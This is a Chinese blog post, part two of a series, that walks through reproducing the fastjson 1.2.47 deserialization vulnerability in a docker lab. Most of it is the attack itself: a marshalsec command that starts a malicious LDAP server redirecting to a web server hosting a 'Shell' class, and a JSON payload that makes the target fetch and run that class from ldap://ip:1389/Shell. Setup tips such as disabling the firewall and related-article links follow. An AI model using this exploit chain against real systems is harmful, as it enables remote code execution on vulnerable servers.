『』fastjson1.2.47反序列化漏洞复现( 二 )


『』fastjson1.2.47反序列化漏洞复现
本文插图

接下来使用marshalsec工具快捷的开启LDAP服务 。 借助LDAP服务将LDAP reference result 重定向到web服务器 。
这里的ip和端口 , 是你web服务的ip端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:8090#Shell 1389
『』fastjson1.2.47反序列化漏洞复现
本文插图

payload:
{
''a'':{
''@type'':''java.lang.Class'',
''val'':''com.sun.rowset.JdbcRowSetImpl''
},
''b'':{
''@type'':''com.sun.rowset.JdbcRowSetImpl'',
''dataSourceName'':''ldap://ip:1389/Shell'',
''autoCommit'':true
『』fastjson1.2.47反序列化漏洞复现
本文插图

『』fastjson1.2.47反序列化漏洞复现
本文插图

『』fastjson1.2.47反序列化漏洞复现
本文插图

No.5 坑点
1.主机A需要关闭防火墙 , 否则无法使用LDAP服务 systemctl stop firewalld;
2.防火墙关闭 , 需要重启docker service docker restart 漏洞环境也需要重新启动一下;
3.jdk版本需要注意 , 下方图片jdk版本不存在此漏洞 。
『』fastjson1.2.47反序列化漏洞复现
本文插图

『』fastjson1.2.47反序列化漏洞复现
本文插图

  • 案例分析:用UEBA解决Equifax的失陷凭证问题
  • 美国政府问责办公室(GAO)报告|国防部并没有解决基本网络安全盲点 遭GAO批评
  • CISO数据安全分级分类实践指南
  • Windows严重蠕虫漏洞将破坏全球的商业网络!
  • 国泰航空被处以ICO50万英镑最高罚款 因数据泄露长达四年之久

『』fastjson1.2.47反序列化漏洞复现
本文插图


推荐阅读